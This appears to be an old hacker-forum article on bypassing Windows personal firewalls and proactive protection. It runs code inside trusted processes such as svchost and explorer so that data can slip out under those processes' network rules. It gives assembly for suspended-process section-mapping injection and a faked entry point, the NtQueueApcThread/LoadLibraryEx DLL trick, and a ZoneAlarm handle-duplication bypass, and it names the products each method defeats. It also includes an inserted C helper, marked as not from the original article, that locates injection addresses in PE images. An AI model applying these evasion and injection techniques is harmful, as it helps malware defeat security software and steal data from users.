Injected Evil

By: evilphreak

 

admin note: The author of this article apologizes for bad english. Most people who read rootkit.com understand that many of the articles are translated from native language - no problems. Staff took some liberty in attempting to rewrite a little bit of it.

In this article I want to describe techniques that bypass the majority of modern proactive protection products and firewalls. The idea is not new and has been around for a while, but I present something that has not appeared before. Some time was invested in it. The material is practical, with only the theoretical minimum. Techniques like these are certainly used, some of the time, in private tools, but until now they have not been brought together and presented.

I owe much to other researchers, and I thank them for their boldness in laying their unique methods before the public. The bypass described here has not appeared anywhere, but it is based on some known techniques. Let us begin.



The theory
======
What is a protection bypass? It is the ability to carry out an action the protection forbids. There are no rules or laws here; there is simply the problem of achieving the result. There is a private war between the authors of firewalls and proactive protection and those who bypass them, and it certainly is a war. The material presented here applies only to the Windows NT family, though the theoretical principles can be used anywhere. Here is a short description of the model.
On the victim computer there is a firewall with 'proactive protection'. The behaviour-blocking firewall is defined by a set of rules, of two kinds: global rules and per-application rules. Generally speaking, at the heart of any protection bypass lie 1) assumptions, 2) exceptions, and 3) mistakes made by the developers of the protection. These three things yield a bypass for practically any protection, and it should be remembered that there has not yet been a protection that was not broken.
We will apply this theory to personal firewalls using the three points set out above. If the search succeeds, we have won.

To bypass a personal firewall one must either use its existing rules, destroy the rule model, or exploit a bug in the protection software. Bugs in the software are the hardest route: first, they are not universal; second, they are difficult to find and to use. The best bypass uses a minimum of undocumented functions and structures and applies to every protection product, i.e. it is universal. I will not present such a bypass; instead we use non-universal, undocumented techniques. Back to the firewall rules: if we break them in ring 0, the protection is finished. To use the existing rules we apply generic injection techniques that have been known for a long time, i.e. executing code in the context of a trusted application. So, if we somehow force the trusted application Internet Explorer to execute our code, we can send data past the protection.
In general it is best to take the default browser and use it as the victim in which our code runs. Finally, from the injected code we exploit the rules the firewall already holds for Internet Explorer (for example, outbound connections on port 80). What remains is to perform the injection unnoticed by the proactive protection, which tries to close every method used for injection. Now we describe concrete attacks against concrete firewalls.

The general theory of injection
=================
An injection always consists of two stages:
1) writing code into the address space of the victim process;
2) executing the written code.

Each stage can take any form, explicit or indirect, and use any available technique. If neither stage is detected by the protection, the injection can be carried out. Both stages are mandatory; without either of them the injection will not happen.

CreateProcess
=============
The algorithm is as follows: in our own process we hook ZwCreateSection and ZwQuerySection in NTDLL, then create the process with CreateProcess. Before CreateProcess returns, the hooked ZwCreateSection/ZwQuerySection are called. Here we need to look inside the process-creation mechanism: one of its stages opens the EXE file and maps it into the address space of the process being created. The mapping is created by ZwCreateSection. In the ZwCreateSection hook it is possible to write arbitrary data with the ordinary KERNEL32!WriteProcessMemory, and the proactive protection stays silent. After the mapping is created, the CreateProcess code obtains the entry point of the new process (i.e. of its main thread) through ZwQuerySection. Our ZwQuerySection hook returns an entry point, but not the real one taken from the optional header: a false one, namely the address of the code we want executed. So by the time CreateProcess finishes, our code runs and sends data wherever it needs to, in the context of the trusted application.

There are a few points I want to draw attention to. In the ZwCreateSection hook it is not always possible to write with WriteProcessMemory; some protections detect it. In that case one can also hook WriteProcessMemory, which is itself called inside CreateProcess: when a process is created, the environment variables of the parent process are written into it if no environment is specified explicitly. By intercepting that WriteProcessMemory call one can write the shellcode instead. The same goes for the PEB. Simpler still, pass the address of our shellcode as the lpEnvironment parameter. But this too does not always work. There is a way of writing that so far always works, provided the process can be created successfully. The writing algorithm is:

1) Call CreateProcess with the CREATE_SUSPENDED flag.
2) Create a file and write the shellcode into it.
3) Create a section backed by the shellcode file with NtCreateSection.
4) Map the section into the address space of the suspended process with NtMapViewOfSection.

The method is known, but far from all protection authors have covered it. Many protections block the creation of a process that will do networking, and some block process creation altogether, but not all. For example, the well-known Kaspersky Internet Security 7.0.0.125 falls to this attack, as do early versions of Agnitum Outpost (and Outpost 2008, if the process can be created successfully), and a heap of foreign firewalls such as Norton Internet Security 2008, Bit Defender Total Security 2008, Zone Alarm 7 on medium settings (on maximum it blocks), Agava Firewall, Ashampoo Firewall, AhnLab V3 Internet Security 2007, Black ICE PC Protection 3.6, Look'n'Stop 2.06, Normal Personal Firewall 1.4, Visnetic Firewall 3.0, etc.

Let us move on to a practical implementation of this method. The default browser is obtained by reading the default value of the registry key "http\shell\open\command":

      ; RegOpenKeyEx(HKEY_CLASSES_ROOT, "http\shell\open\command", 0, KEY_READ, &hKey)
      lea ecx, [hKey]
      push ecx                        ; phkResult
      push KEY_READ                   ; samDesired
      push 0                          ; ulOptions
      lea ecx, [SubKey]
      push ecx                        ; lpSubKey = "http\shell\open\command"
      push HKEY_CLASSES_ROOT
      call RegOpenKeyEx

      ; RegQueryValueEx(hKey, NULL, NULL, NULL, Buffer, &cbData)
      ; cbData must hold the size of Buffer before the call
      lea ecx, [cbData]
      push ecx                        ; lpcbData
      lea ecx, [Buffer]
      push ecx                        ; lpData
      push NULL                       ; lpType
      push NULL                       ; lpReserved
      push NULL                       ; lpValueName = NULL selects the (Default) value
      push [hKey]
      call RegQueryValueEx


After this code runs, Buffer holds the command line registered for the default browser, which is why it is passed to CreateProcess as lpCommandLine rather than lpApplicationName. Next we create the process in the suspended state:


      ; CreateProcess(NULL, Buffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)
      ; si.cb must be set to sizeof(STARTUPINFO) beforehand
      lea eax, [pi]
      push eax                        ; lpProcessInformation
      lea eax, [si]
      push eax                        ; lpStartupInfo
      push NULL                       ; lpCurrentDirectory
      push NULL                       ; lpEnvironment
      push CREATE_SUSPENDED           ; dwCreationFlags: the main thread stays suspended
      push 0                          ; bInheritHandles
      push NULL                       ; lpThreadAttributes
      push NULL                       ; lpProcessAttributes
      lea eax, [Buffer]
      push eax                        ; lpCommandLine = browser command line from the registry
      push NULL                       ; lpApplicationName
      call CreateProcess


Next we create a section over the shellcode file and map it into the address space of the created process:


      ; NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_EXECUTE_READWRITE, SEC_COMMIT, hFile)
      push [hFile]                    ; file holding the shellcode
      push 0x8000000                  ; SEC_COMMIT
      push PAGE_EXECUTE_READWRITE     ; SectionPageProtection
      push NULL                       ; MaximumSize: use the file size
      push NULL                       ; ObjectAttributes
      push SECTION_ALL_ACCESS
      lea eax, [hSection]
      push eax
      call NtCreateSection

      ; NtMapViewOfSection(hSection, hProcess, &BaseAddress, 0, 0, NULL, &ViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE)
      push PAGE_EXECUTE_READWRITE     ; Win32Protect
      push 0                          ; AllocationType
      push 1                          ; InheritDisposition = ViewShare
      mov dword [ViewSize], 0         ; 0 = map the whole section
      lea ecx, [ViewSize]
      push ecx
      push NULL                       ; SectionOffset
      push 0                          ; CommitSize
      push 0                          ; ZeroBits
      push [ebx+FreeBaseAddress-NormalCodeStart]   ; ebx = delta base of our position-independent code
      pop [BaseAddress]               ; preferred address found on the trial run (see below)
      lea ecx, [BaseAddress]
      push ecx
      push [pi + PROCESS_INFORMATION.hProcess]     ; the suspended browser process
      push [hSection]
      call NtMapViewOfSection


Here a problem surfaces: at which address to map the shellcode? After all, at that moment (before CreateProcess returns, in the NtQuerySection hook) we must already have replaced the entry point with the address of our shellcode. One could pick an address in advance, a constant which in testing does not collide with existing mappings, but that is obviously unstable, since collisions can occur and we must guarantee their absence. So we proceed as follows. The first time, we call CreateProcess with CREATE_SUSPENDED without hooking NtCreateSection/NtQuerySection, map the section at an address chosen by the system, and remember that address. Then we destroy the process. Next we create the process again with the hooks on the necessary functions installed, now knowing the mapping address, and after the process is created we map the section at that known address. In effect we perform a collision test on the given system, which should minimise the chance that the address of our shellcode mapping coincides with other memory allocated at that moment. After this the bypass can be considered complete; it remains only to resume the main thread (since we created the process with its main thread suspended):


      push [pi + PROCESS_INFORMATION.hThread]
      call ResumeThread               ; the main thread starts at the faked entry point, i.e. our shellcode


NtQueueApcThread
================
A bypass based on a call to this function defeats almost all existing proactive protections and firewalls, however powerful they may seem. Here is the bypass algorithm:

1) Create a DLL whose name coincides with the last letters of a DLL in the import table of SVCHOST.EXE, for example "ERNEL32.DLL". The DLL should contain the shellcode to be executed in the context of SVCHOST.EXE (in the rules of every firewall this application is allowed network activity, just like Internet Explorer).

2) Search the address space of the SVCHOST.EXE process for the string "ERNEL32.DLL". This can be done by scanning with ReadProcessMemory (after first opening SVCHOST with OpenProcess(PROCESS_VM_READ)). A different and better way to find the string is to map the file SVCHOST.EXE into our own address space and locate "ERNEL32.DLL" in its import table. Adding the relative address of the string to the module's default base address (ImageBase in the optional header) gives the address of the string we need; this holds as long as the executable is loaded at its preferred base, which is the normal case for an EXE on Windows 2000/XP, where there is no address randomisation.

3) Enumerate the threads of the SVCHOST.EXE process and call NtQueueApcThread for each of them. This function queues an APC (asynchronous procedure call) to a thread. But it has a restriction: the procedure executes only when the thread enters an alertable wait. This is what dictates the choice of SVCHOST.EXE as the victim for executing the shellcode: research showed that in all versions of Windows 2000/XP the SVCHOST.EXE process has alertable threads, and SVCHOST.EXE is also a trusted application with legitimate network activity, which clearly entitles us to pick it as the victim. It should also be said that an SVCHOST.EXE process always exists on the system; otherwise the OS blue-screens (if one of the SVCHOST.EXE instances is killed). Here is the prototype of NtQueueApcThread:

proc NtQueueApcThread hThread, FunctionAddress, Par1, Par2, Par3

The function adds a new procedure to the thread's queue of asynchronous procedures; the procedure is called with the STDCALL convention and receives three parameters, Par1, Par2, Par3. Interestingly, there is a function that fits us perfectly and also takes three parameters: LoadLibraryEx. So we simply load our DLL into the address space of the SVCHOST.EXE process.

4) Nothing useful can be done from the DLL itself, because component control (the protection's monitoring of loaded modules) detects it. So everything we do is done in DllMain: it copies the shellcode out of the DLL body and saves the TID and the shellcode address to a file with a known name. After these actions the DLL must be removed.

5) Open the file created inside DllMain and queue to the known thread (its TID is written in the file) the procedure address, which is also known. After that the bypass is finished.
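As an added example (not code from the original article), the following C program performs offline, against a constructed image, the two header look-ups that step 2 above and the CreateProcess method rely on: recovering the real entry point (ImageBase + AddressOfEntryPoint, the value NtQuerySection reports to CreateProcess and that the ZwQuerySection hook replaces) and locating the tail "ERNEL32.DLL" inside the import table's "KERNEL32.dll" string, so that ImageBase + RVA + 1 can be handed to the APC-queued LoadLibraryEx as its first parameter. It parses the file bytes directly without <windows.h>: the PE structures are declared locally with the standard layouts, the sample PE is constructed inline (it is not a real svchost.exe), and the names pe_entry_point_va, pe_find_import_suffix_va and build_sample_pe are this example's own. The match is case-insensitive because linkers commonly emit "KERNEL32.dll", and the walker goes a little beyond the article by bounds-checking every RVA, so a truncated or malformed image yields 0 instead of an out-of-range read.

```c
#include <stdint.h>
#include <string.h>
#include <ctype.h>

/* PE structures declared locally, with the WinNT.h layouts, so this builds anywhere without <windows.h>. */
#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t reserved[58]; uint32_t e_lfanew; } DosHeader;
typedef struct { uint16_t Machine, NumberOfSections; uint32_t TimeDateStamp, PointerToSymbolTable,
                 NumberOfSymbols; uint16_t SizeOfOptionalHeader, Characteristics; } FileHeader;
typedef struct { uint32_t VirtualAddress, Size; } DataDir;
typedef struct {                                                   /* IMAGE_OPTIONAL_HEADER32, 224 bytes */
    uint16_t Magic; uint8_t MajorLinkerVersion, MinorLinkerVersion;
    uint32_t SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData, AddressOfEntryPoint,
             BaseOfCode, BaseOfData, ImageBase, SectionAlignment, FileAlignment;
    uint16_t OsVersion[2], ImageVersion[2], SubsystemVersion[2];
    uint32_t Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum; uint16_t Subsystem, DllCharacteristics;
    uint32_t StackReserve, StackCommit, HeapReserve, HeapCommit, LoaderFlags, NumberOfRvaAndSizes;
    DataDir DataDirectory[16];
} OptionalHeader32;
typedef struct { uint32_t Signature; FileHeader File; OptionalHeader32 Opt; } NtHeaders32;
typedef struct { uint8_t Name[8]; uint32_t VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
                 PointerToRelocations, PointerToLinenumbers; uint16_t NumberOfRelocations, NumberOfLinenumbers;
                 uint32_t Characteristics; } SectionHeader;
typedef struct { uint32_t OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk; } ImportDescriptor;
#pragma pack(pop)
#define DIR_IMPORT 1                                               /* index of the import data directory */

/* Validate MZ / PE\0\0 / PE32 magic and bounds; return the NT headers or NULL. */
static const NtHeaders32 *nt_headers(const uint8_t *img, size_t len)
{
    const DosHeader *dos = (const DosHeader *)img;
    if (len < sizeof(NtHeaders32) || dos->e_magic != 0x5A4D || dos->e_lfanew > len - sizeof(NtHeaders32)) return NULL;
    const NtHeaders32 *nt = (const NtHeaders32 *)(img + dos->e_lfanew);
    return (nt->Signature == 0x00004550 && nt->Opt.Magic == 0x10b) ? nt : NULL;
}

/* Map an RVA to a file offset through the section table (headers map 1:1); -1 if unmapped or out of bounds. */
static long rva_to_offset(const uint8_t *img, size_t len, const NtHeaders32 *nt, uint32_t rva)
{
    if (rva < nt->Opt.SizeOfHeaders) return rva < len ? (long)rva : -1;
    size_t tab = (size_t)((const uint8_t *)nt - img) + 4 + sizeof(FileHeader) + nt->File.SizeOfOptionalHeader;
    if (tab + (size_t)nt->File.NumberOfSections * sizeof(SectionHeader) > len) return -1;
    const SectionHeader *sec = (const SectionHeader *)(img + tab);
    for (uint16_t i = 0; i < nt->File.NumberOfSections; i++)
        if (rva >= sec[i].VirtualAddress && rva - sec[i].VirtualAddress < sec[i].SizeOfRawData) {
            uint64_t off = (uint64_t)sec[i].PointerToRawData + (rva - sec[i].VirtualAddress);
            return off < len ? (long)off : -1;
        }
    return -1;
}

/* Entry point at the preferred base: the value CreateProcess obtains from NtQuerySection. 0 if not a PE32. */
uint32_t pe_entry_point_va(const uint8_t *img, size_t len)
{
    const NtHeaders32 *nt = nt_headers(img, len);
    return nt ? nt->Opt.ImageBase + nt->Opt.AddressOfEntryPoint : 0;
}

/* Walk the import descriptors; return the VA (at ImageBase) of the first module-name tail equal to `suffix`
 * case-insensitively, e.g. "ERNEL32.DLL" inside "KERNEL32.dll". 0 if absent or the image is malformed. */
uint32_t pe_find_import_suffix_va(const uint8_t *img, size_t len, const char *suffix)
{
    const NtHeaders32 *nt = nt_headers(img, len);
    if (!nt || nt->Opt.NumberOfRvaAndSizes <= DIR_IMPORT) return 0;
    size_t m = strlen(suffix);
    long off = rva_to_offset(img, len, nt, nt->Opt.DataDirectory[DIR_IMPORT].VirtualAddress);
    for (; off >= 0 && (size_t)off + sizeof(ImportDescriptor) <= len; off += sizeof(ImportDescriptor)) {
        const ImportDescriptor *d = (const ImportDescriptor *)(img + off);
        if (d->Name == 0 && d->FirstThunk == 0) break;              /* all-zero terminator */
        long noff = rva_to_offset(img, len, nt, d->Name);
        if (noff < 0) continue;
        const char *name = (const char *)(img + noff);
        size_t n = 0, k = 0;
        while ((size_t)noff + n < len && name[n]) n++;               /* bounded strlen */
        if ((size_t)noff + n >= len || n < m) continue;              /* unterminated, or shorter than suffix */
        while (k < m && tolower((unsigned char)name[n - m + k]) == tolower((unsigned char)suffix[k])) k++;
        if (k == m) return nt->Opt.ImageBase + d->Name + (uint32_t)(n - m);
    }
    return 0;
}

/* Constructed sample PE32 (not a real binary): one .rdata section holding an import table that names
 * KERNEL32.dll, preferred base 0x01000000 (svchost's default), entry point RVA 0x1100. Returns its size. */
size_t build_sample_pe(uint8_t *buf, size_t cap)
{
    if (cap < 0x400) return 0;
    memset(buf, 0, 0x400);
    DosHeader dos = { .e_magic = 0x5A4D, .e_lfanew = 0x40 };
    NtHeaders32 nt = { .Signature = 0x00004550,
        .File = { .Machine = 0x014c, .NumberOfSections = 1, .SizeOfOptionalHeader = sizeof(OptionalHeader32) },
        .Opt = { .Magic = 0x10b, .AddressOfEntryPoint = 0x1100, .ImageBase = 0x01000000, .SectionAlignment = 0x1000,
                 .FileAlignment = 0x200, .SizeOfImage = 0x2000, .SizeOfHeaders = 0x200, .NumberOfRvaAndSizes = 16 } };
    nt.Opt.DataDirectory[DIR_IMPORT] = (DataDir){ 0x1000, 2 * sizeof(ImportDescriptor) };
    SectionHeader sec = { .Name = ".rdata", .VirtualSize = 0x200, .VirtualAddress = 0x1000,
                          .SizeOfRawData = 0x200, .PointerToRawData = 0x200 };
    ImportDescriptor imp = { .OriginalFirstThunk = 0x1060, .Name = 0x1040, .FirstThunk = 0x1080 };
    memcpy(buf, &dos, sizeof dos);
    memcpy(buf + 0x40, &nt, sizeof nt);
    memcpy(buf + 0x40 + sizeof nt, &sec, sizeof sec);
    memcpy(buf + 0x200, &imp, sizeof imp);                        /* descriptor 1 stays all-zero: terminator */
    memcpy(buf + 0x240, "KERNEL32.dll", 13);                      /* lands at RVA 0x1040 */
    return 0x400;
}
```

Calling build_sample_pe and then the two look-ups yields 0x01001100 for the entry point and 0x01001041 for "ERNEL32.DLL" (0x01000000 + 0x1040 + 1). The addresses are only meaningful while the image sits at its preferred ImageBase; on a relocated image the RVA must be added to the actual load address instead, and a walker run over ReadProcessMemory output rather than file bytes would translate RVAs by section virtual address, not by PointerToRawData.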

This bypass already defeats both Comodo Firewall 2.4 and Agnitum Outpost 2008, as well as all the protections named in the previous section. Those still standing are Jetico and Tiny; I will say nothing here about bypassing them, since that is a separate conversation. Zone Alarm 7 in paranoid mode catches this kind of bypass, namely it does not allow a thread to be opened in order to deliver an APC to it, but a separate bypass, which I describe below, was made for it.

Zone Alarm
==========
ZoneAlarm has a special model: Trusted Applications. If something is executed in the context of a Super Trusted application, ZA pays no attention to it. One such Super Trusted application is EXPLORER.EXE. ZA also has a special protection model: rather than hooking a heap of thread- and process-related functions in the SDT, it simply does not allow a process or thread to be opened with access rights that could lead to a security breach. I.e. if you open a process or a thread, ZA complains. But a bug was found that allows the process to be opened all the same. Here is the algorithm:

1) Open the process with PROCESS_DUP_HANDLE rights; ZA allows this.

2) Enumerate the handles of EXPLORER.EXE looking for a handle to one of EXPLORER.EXE's own threads. Check the handle's access rights; if they are maximal, call DuplicateHandle. I.e. we obtain a thread handle with maximum privileges.

3) Now the injection can be made. Control can be transferred with SetThreadContext, since we have the thread handle. But to write data into the process a separate, well-known technique is needed. About that in the next point.

4) While enumerating handles we also obtain a port handle: EXPLORER.EXE has an LPC port in all versions. Having obtained the port handle, we get its name. After that we call NtConnectPort, passing a section that is a view of our shellcode file; LPC maps the section supplied with the connection into the server process, so, as if by magic, the shellcode appears in the address space of EXPLORER.EXE.

5) SetThreadContext is used to transfer control to our shellcode.

6) Since on behalf of EXPLORER.EXE various system things can be done (but not network activity) without fear of a ZA alert, we use the method named CreateProcess, described above, for the final bypass of ZA on paranoid settings.

As can be seen, the bypass rests on the fact that it is still possible to obtain a thread handle without ZA detecting it. We were lucky that the EXPLORER process holds handles to its own threads with maximum privileges, and also has a port, connecting to which allows the shellcode to be written into the victim's address space using a previously published method. While researching ZA it also turned out that ZA allows the process CTFMON.EXE to be opened with maximum privileges without warning the user. This fact can likewise easily be used to bypass ZA. But CTFMON.EXE is not always running (though it very often is: Windows itself registers it for automatic start at installation), and it appeared only in Windows XP, so this way is not universal (it cannot be used on Windows 2000), though it can be applied successfully on Windows XP. On Windows XP SP2 it also turned out that the process EXPLORER.EXE holds a handle with maximum privileges; after obtaining it, any manipulation of the process is possible. Further tests showed this to be a Service Pack 2 bug: the defect is not found on Service Pack 1, nor on the original Windows XP RTM.

There will be no PoC. Burn in hell, script kiddies!

Greets to Ms-Rem, EP_XOFF, Tyler Durden, deadbody, ntldr

FEEDBACK
=======
mail: evil_phreak@mail.ru
web: evilphreak.blog.ru
 